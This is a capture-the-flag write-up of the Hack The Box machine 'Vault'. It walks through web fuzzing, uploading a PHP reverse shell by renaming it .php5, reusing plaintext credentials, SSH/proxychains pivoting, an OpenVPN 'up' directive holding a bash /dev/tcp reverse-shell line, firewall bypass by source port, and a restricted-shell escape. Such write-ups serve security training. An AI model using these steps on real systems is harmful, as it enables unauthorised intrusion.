Vault

06/04/2019

I found Vault a pretty tough box being ranked as medium, because it's easy to get an initial shell (it only requires some web fuzzing), but then you need to make several lateral movements through different machines in the right way in order to achieve the flags, besides it requires a basic knowledge of PGP to get root.

User Privilege Escalation

User

First run nmap to see only ports 22 and 80 are open.

root@kali:~/htb/vault# nmap -sC -sV 10.10.10.109
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-07 14:55 UTC
Nmap scan report for 10.10.10.109
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)
|   256 2c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)
|_  256 98:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.96 seconds

In the main page of the Apache server we have the following text.

As the page talks about a client Sparklays we look for some web content with wfuzz in /sparklays directory and we can find the following sites.

root@kali:~/htb/vault# wfuzz -w /usr/share/wordlists/dirb/common.txt -z list,-.php-.html --hc 404,403 http://10.10.10.109/sparklays/FUZZFUZ2Z

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.1 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.109/sparklays/FUZZFUZ2Z
Total requests: 13842

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000857:  C=200     13 L	      38 W	    615 Ch	  "admin - .php"
000868:  C=200     13 L	      38 W	    615 Ch	  "admin.php - "
003694:  C=301      9 L	      28 W	    323 Ch	  "design - "
007040:  C=200      3 L	       2 W	     16 Ch	  "login - .php"

In /sparklays/admin.php we have an admin login panel, but after trying some default credentials and obtain nothing I left this behind.

In the other site, /sparklays/login.php, we have a simple message.

We look for more web content on /sparklays/design directory.

root@kali:~/htb/vault# wfuzz -w /usr/share/wordlists/dirb/common.txt -z list,-.php-.html --hc 404,403 http://10.10.10.109/sparklays/design/FUZZFUZ2Z

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.1 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.109/sparklays/design/FUZZFUZ2Z
Total requests: 13842

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

003696:  C=200      3 L	       8 W	     72 Ch	  "design - .html"
012646:  C=301      9 L	      28 W	    331 Ch	  "uploads - "

In /sparklays/design/design.html we have a page with just a link.

If we click on it we get redirected to a form where we can upload files. The /sparklays/design/uploads directory (also on wfuzz output) it's likely to be storing those uploaded files.

We're going to upload a php reverse shell there to gain access to the machine, but if we try to upload a .php file we get "sorry that file type is not allowed", we just have to change the file extension to .php5 and we get the file uploaded correctly.

Access to http://10.10.10.109/sparklays/design/uploads/php-reverse-shell.php5, we get our code executed and if listening on the specified port we get a shell as www-data.

root@kali:~/htb/vault# nc -nlvp 6969
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::6969
Ncat: Listening on 0.0.0.0:6969
Ncat: Connection from 10.10.10.109.
Ncat: Connection from 10.10.10.109:49780.
Linux ubuntu 4.13.0-45-generic #50~16.04.1-Ubuntu SMP Wed May 30 11:18:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 07:43:29 up  3:10,  3 users,  load average: 0.09, 0.04, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
dave     pts/11   10.10.14.80      06:36   22.00s  0.12s  0.05s python3 -c import pty;pty.spawn("/bin/bash")
dave     pts/16   127.0.0.1        06:42   60.00s  0.08s  0.08s -bash
dave     pts/18   10.10.13.91      07:40    9.00s  0.20s  0.20s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

Doing some simple enumeration we can find the following files in Dave's desktop which we can read.

$ ls -la /home/dave/Desktop
total 20
drwxr-xr-x  2 dave dave 4096 Sep  3 06:51 .
drwxr-xr-x 18 dave dave 4096 Sep  3 08:34 ..
-rw-rw-r--  1 alex alex   74 Jul 17  2018 Servers
-rw-rw-r--  1 alex alex   14 Jul 17  2018 key
-rw-rw-r--  1 alex alex   20 Jul 17  2018 ssh

We have some interesting information here: in Servers some network information, in key what it seems to be a password and in ssh probably the ssh credentials.

$ cat Servers
DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x
$ cat key
itscominghome
$ cat ssh
dave
Dav3therav3123

We can use those ssh credentials to get a more stable shell as dave.

root@kali:~/htb/vault# ssh dave@10.10.10.109
dave@10.10.10.109's password: Dav3therav3123
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-45-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

222 packages can be updated.
47 updates are security updates.

Last login: Thu Feb  7 07:47:56 2019 from 10.10.16.35
dave@ubuntu:~$ 

Now we can see the admin panel and the login page code to confirm those were just rabbit holes.

dave@ubuntu:/var/www/html/sparklays$ cat login.php 
access denied


dave@ubuntu:/var/www/html/sparklays$ cat admin.php 
<div class="container">
<form action ="admin.php" method="GET">
        <h2 class="form-signin-heading">Please Login</h2>
        <div class="input-group">
	  <span class="input-group-addon" id="basic-addon1">username</span>
	  <input type="text" name="username" class="form-control" placeholder="username" required>
	</div>
        <label for="inputPassword" class="sr-only">Password</label>
        <input type="password" name="password" id="inputPassword" class="form-control" placeholder="Password" required>
        <button class="btn btn-lg btn-primary btn-block" type="submit">Login</button>

      </form>
<?php
$username =$_GET["username"];
$domain = $_SERVER["SERVER_NAME"];
$requri = $_SERVER['REQUEST_URI'];
if (($domain == "localhost") )  { 
   Header( "Welcome Dave" ); 
   header("location: sparklays-local-admin-interface-0001.php
  "); 
}

else if (($username == "dave")) {
  setcookie(sparklaysdatastorage.htb-unbreakable-cookie);

}

?>

As we saw in Servers file we have more machines on this network (192.168.122.4 [DNS + Configurator], 192.168.122.5 [Firewall] and x [Vault]) and because we don't seem to have any flags in this host, let's use nc to see what services they're running to try to jump.

dave@ubuntu:/var/www/html/sparklays$ nc -zv 192.168.122.5 1-65535 2>&1 | grep succeeded
dave@ubuntu:/var/www/html/sparklays$ nc -zv 192.168.122.4 1-65535 2>&1 | grep succeeded
Connection to 192.168.122.4 22 port [tcp/ssh] succeeded!
Connection to 192.168.122.4 80 port [tcp/http] succeeded!

We can see we have ssh and some web service available in 129.168.122.4 (DNS + Configurator machine according to the Servers file).

Since we don't have curl in this machine and it's always easier to work with a web browser, we're going to make a port forwarding to make accessible 192.168.122.4 from our local machine.

I'm making a dynamic port forwarding which will allow to make any TCP connection through the ubuntu host if we use proxychains, then we will be able to connect to 192.168.122.x network.

man ssh:
-f To request ssh to go background.
-N Do not execute a remote command.
-D Dynamic port forwarding.

root@kali:~/htb/vault# ssh -fND 1337 dave@10.10.10.109
dave@10.10.10.109's password: Dav3therav3123
root@kali:~/htb/vault# 

Next modify proxychains configuration (/etc/proxychains.conf) in our local machine and add the following line to use the specified port to connect with SOCKS5.

socks5 	127.0.0.1 1337

We can confirm everything works as expected making a curl request through proxychains.

root@kali:~/htb/vault# curl 192.168.122.4

root@kali:~/htb/vault# proxychains curl 192.168.122.4
ProxyChains-3.1 (http://proxychains.sf.net)
<h1> Welcome to the Sparklays DNS Server </h1>
<p>
<a href="dns-config.php">Click here to modify your DNS Settings</a><br>
<a href="vpnconfig.php">Click here to test your VPN Configuration</a>

You can use this configuration in FoxyProxy or in the web browser configuration to also use SOCKS5 as proxy.

Now we're able to connect to 192.168.122.4 web page through the web browser.

The first option redirects us to /dns-config.php but we get a 404 error, so nothing to see here.

The "test your VPN Configuration" link redirects us to /vpnconfig.php where we seem to have a textarea we can use to modify a .ovpn file and a link to test it.

Meanwhile we had wfuzz running through proxychains to look for more web content and we found a /notes file.

root@kali:~/htb/vault# proxychains wfuzz -w /usr/share/wordlists/dirb/common.txt --hc 404,403 http://192.168.122.4/FUZZ
ProxyChains-3.1 (http://proxychains.sf.net)

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.1 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.122.4/FUZZ
Total requests: 4614

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000001:  C=200      6 L	      25 W	    195 Ch	  ""
002021:  C=200      6 L	      25 W	    195 Ch	  "index.php"
002695:  C=200      1 L	       6 W	     36 Ch	  "notes"

Accessing to /notes we have a note containing two filenames: 123.ovpn and script.sh.

They are accessible through the web server, so let's download them to see what's inside.

root@kali:~/htb/vault# proxychains wget 192.168.122.4/123.ovpn
root@kali:~/htb/vault# proxychains wget 192.168.122.4/script.sh
...
root@kali:~/htb/vault# cat 123.ovpn 
remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"
root@kali:~/htb/vault# cat script.sh 
#!/bin/bash
sudo openvpn 123.ovpn

The .ovpn file it's the one we can edit and run in /vpnconfig.php.

We could modify the ovpn configuration but since the default one can give us a shell in 192.168.122.1 (the ubuntu host) let's use it.

Click on Test VPN or access to http://192.168.122.4/vpnconfig.php?function=testvpn to execute the ovpn and if we were listening on the specified port in the ubuntu machine, we get a shell in DNS as root.

dave@ubuntu:/tmp$ nc -nlvp 2323
Listening on [0.0.0.0] (family 0, port 2323)
Connection from [192.168.122.4] port 2323 [tcp/*] accepted (family 2, sport 48334)
bash: cannot set terminal process group (1089): Inappropriate ioctl for device
bash: no job control in this shell
root@DNS:/var/www/html# 

Here we can find the user flag in dave's home folder.

root@DNS:/home/dave# cat user.txt
cat user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Privilege Escalation

First of all, we can also find a ssh file with some credentials.

root@DNS:/home/dave# cat ssh
cat ssh
dave
dav3gerous567

We can get a more stable shell using those credentials, instead of using the ovpn.

dave@ubuntu:~$ ssh dave@192.168.122.4
dave@192.168.122.4's password: dav3gerous567
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

98 packages can be updated.
50 updates are security updates.


Last login: Fri Feb  8 07:53:00 2019 from 192.168.122.1
dave@DNS:~$ 

In the sudo configuration we can see dave can execute everything as root.

dave@DNS:~$ sudo -l
Matching Defaults entries for dave on DNS:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dave may run the following commands on DNS:
    (ALL : ALL) ALL

If we check /etc/hosts we can also see the IP for our target machine (Vault) is 192.168.5.2.

dave@DNS:~$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	DNS
192.168.5.2	Vault
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

After some enumeration we can find some interesting information about the vault host in /var/log/auth.log, where we have all authentication related events.

dave@DNS:/home$ sudo less /var/log/auth.log
...
Sep  2 15:07:51 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
...
Sep  2 15:10:20 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
...
Sep  2 15:10:34 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53
...

If we replicate the nmap command we can see port 987 is open in 192.168.5.2.

dave@DNS:/home$ sudo /usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f

Starting Nmap 7.01 ( https://nmap.org ) at 2019-02-08 10:33 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0042s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
987/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 43.47 seconds

Looking in netstat we can see there's a connection between the port 53 and 4444 of DNS host and the port 987 of the vault host.

dave@DNS:~$ netstat -atun
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
tcp        1      0 192.168.122.4:55434     192.168.122.1:4411      CLOSE_WAIT 
tcp        0      0 192.168.122.4:4444      192.168.5.2:987         TIME_WAIT  
tcp        0      0 192.168.122.4:53        192.168.5.2:987         TIME_WAIT  
tcp        6      0 192.168.122.4:55432     192.168.122.1:4411      CLOSE_WAIT 
tcp        0      0 192.168.122.4:55436     192.168.122.1:4411      ESTABLISHED
tcp        0      0 192.168.122.4:22        192.168.122.1:47692     ESTABLISHED
tcp6       0      0 :::80                   :::*                    LISTEN     
tcp6       0      0 :::22                   :::*                    LISTEN     
tcp6       0      0 192.168.122.4:80        192.168.122.1:50616     ESTABLISHED
tcp6       1      0 192.168.122.4:80        192.168.122.1:50556     CLOSE_WAIT 
tcp6       1      0 192.168.122.4:80        192.168.122.1:50586     CLOSE_WAIT 

In the auth.log we also had a ncat command, let's try it to see what do we get.

dave@DNS:~$ sudo ncat 192.168.5.2 987 -p 53
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4

So it seems that only if we use port 53 or 4444 as source port, we can connect to a ssh service in vault.

To make the ssh client to run on a specified source port we can use the full command we got in auth.log that makes a port forwarding in the same host.

dave@DNS:~$ sudo /usr/bin/ncat -l 1234 --sh-exec "ncat 192.168.5.2 987 -p 53"

Since the above command is blocking we could use & to run it on background or open another console in the machine.

Now if we connect to the port specified in the port forwarding at localhost we get the ssh connection to 192.168.5.2.

dave@DNS:~$ nc localhost 1234
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4

If we run ssh with the same credentials we used in the DNS machine we get access to the vault.

dave@DNS:~$ ssh dave@localhost -p 1234
dave@localhost's password: dav3gerous567
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-116-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

96 packages can be updated.
49 updates are security updates.


Last login: Mon Sep  3 16:48:00 2018
dave@vault:~$ 

Unfortunately is a restricted shell and we can't execute almost anything.

dave@vault:~$ cd ..
-rbash: cd: restricted

We can easily escape that restricted shell using the following ssh command instead.

dave@DNS:~$ ssh dave@localhost -p 1234 -t "bash --noprofile"
dave@localhost's password: 
dave@vault:~$ cd ..
dave@vault:/home$ 

In dave's home folder we have an interesting file root.txt.gpg.

dave@vault:~$ ls -la
total 40
drwxr-xr-x 5 dave dave 4096 Sep  3 16:47 .
drwxr-xr-x 4 root root 4096 Jul 17  2018 ..
-rw------- 1 dave dave   11 Sep  3 16:47 .bash_history
-rw-r--r-- 1 dave dave  220 Jul 17  2018 .bash_logout
-rw-r--r-- 1 dave dave 3771 Jul 17  2018 .bashrc
drwx------ 2 dave dave 4096 Jul 17  2018 .cache
drwxrwxr-x 2 dave dave 4096 Sep  2 15:11 .nano
-rw-r--r-- 1 dave dave  655 Jul 17  2018 .profile
-rw-rw-r-- 1 dave dave  629 Sep  3 14:57 root.txt.gpg
drwx------ 2 dave dave 4096 Jul 17  2018 .ssh

This is an encrypted pgp message and we need a certain private key to decrypt it.

dave@vault:~$ file root.txt.gpg
root.txt.gpg: PGP RSA encrypted session key - keyid: 10C678C7 31FEBD1 RSA (Encrypt or Sign) 4096b .

Unfortunately we don't seem to have it on this host.

dave@vault:~$ gpg -d root.txt.gpg 
gpg: directory `/home/dave/.gnupg' created
gpg: new configuration file `/home/dave/.gnupg/gpg.conf' created
gpg: WARNING: options in `/home/dave/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/home/dave/.gnupg/secring.gpg' created
gpg: keyring `/home/dave/.gnupg/pubring.gpg' created
gpg: encrypted with RSA key, ID D1EB1F03
gpg: decryption failed: secret key not available

But we do have that private key with ID D1EB1F03 in the ubuntu host we first visited.

dave@ubuntu:~$ gpg --list-secret-keys
/home/dave/.gnupg/secring.gpg
-----------------------------
sec   4096R/0FDFBFE4 2018-07-24
uid                  david <dave@david.com>
ssb   4096R/D1EB1F03 2018-07-24

Now we have to move that encrypted message to the ubuntu machine, and since it contains non ascii characters we can't simply copy and paste it. We could move it from machine to machine to ubuntu using scp, but I found easier to convert it to basee64 and copy paste it.

Since we don't have the base64 command I used python (python3m because we don't have the default python executable either).

dave@vault:~$ python3m
Python 3.5.2 (default, Nov 23 2017, 16:37:01) 
[GCC 5.4.0 20160609] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> with open("root.txt.gpg", "rb") as f:
...     print(base64.b64encode(f.read()))
... 
b'hQIMA8d4xhDR6x8DARAAoJjq0xo2bn5JfY3Q6EMVZjkwUK7JPcwUEr1RNUx98k41oOFdtugxUjwHSZ9x9BU9sph696HhlKlPO0au7DeFyxqPFbjR2CdwoT9PBf8vuSEzEqVltvAq31jQbXpUSA2AxYSj3fWKCAkIPcUBTTcJAnac0EMmXlAQzdAmvFEU+9BRkcpJDSpYV8W2IQf+fsnh14hcc5tXZQZX0mPtLlwYVlJq4xgpV3znnJrrlUgKJqkqhq1i2/JEAL5Ul1k5as9Ha1N8KffjmfEsrRQl8TS5NLoC3mVp3w90X0LYhyDcRz7HPzXfdPMdM+G9NEX1zY4c6cr1sxOdLcpUwbZ4itd7XjCA71B23Ncd7eniLGCkErDaVkZh8oa4DyIG78bxqFTDgk6XrH6pz9XRXhDBSZnCezI90WkbxGecOB42cAOwGkuHcnSF44eXDT60Yl9h6bvRZVEQF3/39ee+nMaW5b5PnWzGb/PC4kT3ZDeWYSiloF6a5sOwDO2CL/qipnAFPj8UthhrCCcQj4rRH2zeeh4y9fh3m3G37Q+U9lNgpjzj0nzVCfjdrMRvUs5itxwpjwaxN6q2q1kxe1DhPCzaAHhLT7We7p2hxdSj1yPgefSzJ39GENgJI1fbTDEaMzwkPra4I2MiJCEVgZnV29oRHPYrmGsfx4tSkBy6tJW342/s88fSZAFwRHa6C9Hrr7GSVucoJ5z2kNKAPnS/cUmBc3OdeJlMxdfzQTMucmv89wwgNgKNLO6wmSFppVRnpmLE+AFoCEqg/JS91N5mVhZPkHwW6V94CxMF/3xqTMKpzBfdERq0MGYij98='

Copy and paste to the ubuntu machine and base64 decode it back.

dave@ubuntu:/tmp$ echo -n hQIMA8d4xh...Yij98= | base64 -d > caca

Now we can decrypt it using the password we found at the beginning in the key file (itscominghome) and get the root flag.

dave@ubuntu:/tmp$ gpg -d caca

You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)

gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
      "david <dave@david.com>"
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX